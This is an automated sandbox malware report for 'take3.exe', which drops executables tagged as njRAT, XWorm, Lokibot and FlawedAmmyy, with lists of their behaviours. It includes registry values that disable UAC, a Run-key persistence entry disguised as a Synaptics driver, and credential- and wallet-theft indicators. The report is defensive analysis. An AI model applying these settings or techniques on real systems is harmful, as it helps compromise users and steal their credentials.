Malware Analysis Report

2025-01-23 12:19

Sample ID 241128-b8cczazmcy
Target take3.exe
SHA256 9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
Tags
ammyyadmin flawedammyy lokibot metasploit njrat xworm backdoor collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan upx pyinstaller
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53

Threat Level: Known bad

The file take3.exe was found to be: Known bad.

Malicious Activity Summary

ammyyadmin flawedammyy lokibot metasploit njrat xworm backdoor collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan upx pyinstaller

FlawedAmmyy RAT

Ammyy Admin

MetaSploit

Ammyyadmin family

AmmyyAdmin payload

Lokibot

Flawedammyy family

Lokibot family

Metasploit family

Njrat family

Xworm family

Xworm

UAC bypass

njRAT/Bladabindi

Detect Xworm Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Sets file to hidden

Downloads MZ/PE file

Blocklisted process makes network request

Executes dropped EXE

Drops startup file

Reads data files stored by FTP clients

Checks BIOS information in registry

Unsecured Credentials: Credentials In Files

Loads dropped DLL

Identifies Wine through registry keys

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Suspicious use of SetThreadContext

Drops file in Windows directory

Command and Scripting Interpreter: JavaScript

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Detects Pyinstaller

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Access Token Manipulation: Create Process with Token

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

outlook_win_path

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

outlook_office_path

Modifies data under HKEY_USERS

Views/modifies file attributes

Delays execution with timeout.exe

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 01:48

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 01:48

Reported

2024-11-28 01:49

Platform

win11-20241007-en

Max time kernel

48s

Max time network

76s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\c1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SystemTemp C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772321430293249" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Downloads\UrlHausFiles\System.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_System.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\msiexec.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
